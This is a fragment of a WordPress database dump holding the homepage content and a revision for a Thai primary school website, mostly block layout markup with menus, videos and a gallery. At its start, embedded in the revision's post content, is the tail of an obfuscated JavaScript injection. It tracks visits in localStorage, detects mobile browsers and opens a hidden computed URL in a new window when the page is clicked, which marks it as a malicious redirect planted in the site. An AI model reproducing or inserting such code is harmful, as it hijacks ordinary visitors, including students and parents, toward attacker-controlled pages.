_0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-27 21:52:27','2024-07-27 14:52:27','',19,'http://watprato.ssk.in.th/?p=80',0,'revision','',0),
(82,1,'2024-07-27 21:52:40','2024-07-27 14:52:40','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:video {\"id\":79,\"align\":\"full\"} -->\n<figure class=\"wp-block-video alignfull\"><video autoplay controls loop src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/อนุบาลวัดพระโต.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button 